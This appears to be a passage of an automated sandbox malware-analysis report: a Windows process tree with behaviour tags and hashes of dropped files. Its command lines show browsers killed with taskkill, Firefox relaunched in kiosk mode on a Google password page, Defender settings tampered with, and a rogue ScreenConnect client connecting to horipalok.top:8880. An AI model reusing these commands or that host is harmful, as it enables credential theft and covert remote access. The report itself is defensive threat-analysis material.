                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381450101\103d47656e.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381450101\103d47656e.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:2864
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381460101\c00502e7e8.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381460101\c00502e7e8.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5640
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381470101\5dc5a52a64.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381470101\5dc5a52a64.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:5560
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /IM firefox.exe /T
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5824
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /IM chrome.exe /T
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:2088
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /IM msedge.exe /T
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5692
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /IM opera.exe /T
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5600
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /IM brave.exe /T
                                                                                                                              7⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:6036
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                              7⤵
                                                                                                                                PID:1516
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                  8⤵
                                                                                                                                  • Drops desktop.ini file(s)
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:3028
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {84b14381-6bbb-4162-a64a-876b2d7682ea} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                    9⤵
                                                                                                                                      PID:5148
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2484 -initialChannelId {effc59a7-d702-4ce5-8a13-c41310001682} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                      9⤵
                                                                                                                                        PID:2296
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3704 -prefsLen 25164 -prefMapHandle 3708 -prefMapSize 270279 -jsInitHandle 3712 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3780 -initialChannelId {a53110dc-70b4-4511-9270-8c2fbb3b3bc5} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:5588
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3816 -prefsLen 27276 -prefMapHandle 3804 -prefMapSize 270279 -ipcHandle 4036 -initialChannelId {c54238a1-8e1d-4d18-8829-1cff843141a4} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                        9⤵
                                                                                                                                          PID:2840
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2964 -prefsLen 34775 -prefMapHandle 4352 -prefMapSize 270279 -jsInitHandle 2996 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4280 -initialChannelId {1334ce38-536c-47bd-bb89-d983f31eccab} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                          9⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:2300
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5108 -prefsLen 35012 -prefMapHandle 5112 -prefMapSize 270279 -ipcHandle 5124 -initialChannelId {4a5f3f03-29c4-412f-ace5-845163e9cf50} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                          9⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5892
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5528 -prefsLen 32900 -prefMapHandle 5532 -prefMapSize 270279 -jsInitHandle 5536 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5540 -initialChannelId {fa35e4ac-4bd3-4063-9143-4c1021656ff3} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                          9⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5756
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5712 -prefsLen 32900 -prefMapHandle 5716 -prefMapSize 270279 -jsInitHandle 5720 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5728 -initialChannelId {fd219214-0c3a-476c-9105-e190893ae6f8} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                          9⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5804
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32900 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {5857fa53-2a32-43b6-bbe1-3a3986d0447c} -parentPid 3028 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3028" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                          9⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:5816
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381480101\5544699acf.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381480101\5544699acf.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                                                    • Modifies Windows Defender TamperProtection settings
                                                                                                                                    • Modifies Windows Defender notification settings
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Windows security modification
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5544
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381490101\70d75e69ad.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381490101\70d75e69ad.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6484
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381500101\ebbeb1daef.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381500101\ebbeb1daef.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6352
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381510101\2983c11b74.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381510101\2983c11b74.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6448
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381510101\2983c11b74.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5620
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381520101\100493e523.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381520101\100493e523.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:764
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381520101\100493e523.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6552
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381530101\de58d98339.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381530101\de58d98339.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:6972
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      7⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6472
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381540101\e7359fc4ac.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381540101\e7359fc4ac.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6700
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5292
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
                                                                                                                                      7⤵
                                                                                                                                        PID:1344
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:6824
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:7076
                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                1⤵
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Boot or Logon Autostart Execution: Authentication Package
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4632
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 5C5AD1F1926054B9F7755B3272FC049B C
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3900
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI2536.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240657781 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                    3⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:404
                                                                                                                                • C:\Windows\system32\srtasks.exe
                                                                                                                                  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                  2⤵
                                                                                                                                    PID:2220
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 2B9D35E38D8F4C5DF27EB9B5D159D5F7
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3608
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding C999DB6B6E9E80C18CBD5B2CDFC89228 E Global\MSI0000
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:1736
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 4EEF724C6580A773482C0D02973FC4EF C
                                                                                                                                    2⤵
                                                                                                                                      PID:5832
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIA09B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240754968 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                        3⤵
                                                                                                                                          PID:5424
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding D00BE825B6D8E78299E6BD1AD401156F
                                                                                                                                        2⤵
                                                                                                                                          PID:6540
                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                        1⤵
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        PID:2756
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                                        1⤵
                                                                                                                                          PID:2860
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                                            2⤵
                                                                                                                                              PID:2944
                                                                                                                                          • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
                                                                                                                                            "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=2dd23bfb-0dc2-462d-9695-d02a83372e44&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
                                                                                                                                            1⤵
                                                                                                                                            • Sets service image path in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:3844
                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
                                                                                                                                              "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "6f72311e-0971-426d-8c99-2857a9c92e9e" "User"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2916
                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
                                                                                                                                              "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "328eee50-1875-4b98-8f6d-ff31c6731a78" "System"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:2352
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                            1⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:3552
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:1328
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2628
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:6960
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3284
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:7104

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\Config.Msi\e5865ea.rbs

                                                                                                                                              Filesize

                                                                                                                                              214KB

                                                                                                                                              MD5

                                                                                                                                              8484ed93b1b99e3b592435733e0fabe9

                                                                                                                                              SHA1

                                                                                                                                              d9fd5f89db49d2f5d36eea9a2cbcdb474bfc6d4e

                                                                                                                                              SHA256

                                                                                                                                              ccc37e5a5d7da03164ba4f99d8b7ff19c2033318f031d6866e64f1458f517f31

                                                                                                                                              SHA512

                                                                                                                                              3a0709ca766b5f670a34a5928d181ac30b88ded341a561354af18a411d26ba50fc44ae6365a30be88a37a87475bd3c43393363cbb0897a8295a2c922b6b123bc

                                                                                                                                            • C:\Config.Msi\e5865ec.rbs

                                                                                                                                              Filesize

                                                                                                                                              3KB

                                                                                                                                              MD5

                                                                                                                                              d2e8e6b3bdd1ebf274d795ec77ca4e90

                                                                                                                                              SHA1

                                                                                                                                              71b1cb6a4bf92f6b853e7a554fae7237fd76b072

                                                                                                                                              SHA256

                                                                                                                                              b87f066febff2fcd3fa1d7f7153e74a40097db2d6abcfb8db6f294258d0fa22f

                                                                                                                                              SHA512

                                                                                                                                              040f85be34c4672c3e2c95c2ee7273f0af3920894a4275c84688ce3cf51e6db4bacca3e32fa121ecd3744a68d7293984bb3084301fd9c6c4e7241708dd043ee7

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources

                                                                                                                                              Filesize

                                                                                                                                              673B

                                                                                                                                              MD5

                                                                                                                                              b33dfc50d8dffa7cbfe5b088165a3232

                                                                                                                                              SHA1

                                                                                                                                              d12c7a7426cad0c5e2933ff02bc10a152c8a1d7b

                                                                                                                                              SHA256

                                                                                                                                              05fd879a17ea524af81b989de294570d3bf1912f6aae8ed70afab0fcb3d0f825

                                                                                                                                              SHA512

                                                                                                                                              924a7b091b43033cbcbc05af68b7a92c6b618887a3c23494f60bb98a5191d1127c0573fc8770a22dce1b0ffa2398dca60212fa30e3ee330803752aaeb3744388

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources

                                                                                                                                              Filesize

                                                                                                                                              48KB

                                                                                                                                              MD5

                                                                                                                                              d524e8e6fd04b097f0401b2b668db303

                                                                                                                                              SHA1

                                                                                                                                              9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

                                                                                                                                              SHA256

                                                                                                                                              07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

                                                                                                                                              SHA512

                                                                                                                                              e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll

                                                                                                                                              Filesize

                                                                                                                                              192KB

                                                                                                                                              MD5

                                                                                                                                              ff388e261fcb88bb2fb4295b4e84be66

                                                                                                                                              SHA1

                                                                                                                                              622e9b646881e4606a9a82d06e48329cfebe83aa

                                                                                                                                              SHA256

                                                                                                                                              8872211a8f4ff520d9d3342ed3841eb6fe42f6d83a0f639f6baf84795da99de2

                                                                                                                                              SHA512

                                                                                                                                              8d52b6fb173714f026df687064a20f42ac7c016ff9e41e941737d3a5159a0027d5acf420bc03f5bcde59cdb21586a77e491df26528b87b550e880cf7ab8a3929

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll

                                                                                                                                              Filesize

                                                                                                                                              67KB

                                                                                                                                              MD5

                                                                                                                                              ffedbac44fe3af839d5ae3c759806b2c

                                                                                                                                              SHA1

                                                                                                                                              71e48c88dfffe49c1c155181e760611c65f6ca50

                                                                                                                                              SHA256

                                                                                                                                              42e0add27d20e2393f9793197798ac7d374812a6dcd290b153f879a201e546af

                                                                                                                                              SHA512

                                                                                                                                              533d9284c15c2b0bf4b135fc7e55a04139d83065282fd4af54866b8b2b6966a0989d4ecf116b89a9b82d028ef446986aa1b92bb07b1521b1aef15ba286b75358

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe

                                                                                                                                              Filesize

                                                                                                                                              93KB

                                                                                                                                              MD5

                                                                                                                                              d3e628c507dc331bab3de1178088c978

                                                                                                                                              SHA1

                                                                                                                                              723d51af347d333f89a6213714ef6540520a55c9

                                                                                                                                              SHA256

                                                                                                                                              ea1cfad9596a150beb04e81f84fa68f1af8905847503773570c901167be8bf39

                                                                                                                                              SHA512

                                                                                                                                              4b456466d1b60cda91a2aab7cb26bb0a63aaa4879522cb5d00414e54f6d2d8d71668b9e34dff1575cc5b4c92c61b9989abbe4b56a3e7869a41efcc45d23ca966

                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                                                                                                              Filesize

                                                                                                                                              254KB

                                                                                                                                              MD5

                                                                                                                                              5adcb5ae1a1690be69fd22bdf3c2db60

                                                                                                                                              SHA1

                                                                                                                                              09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                                                                                                                                              SHA256

                                                                                                                                              a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                                                                                                                                              SHA512

                                                                                                                                              812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

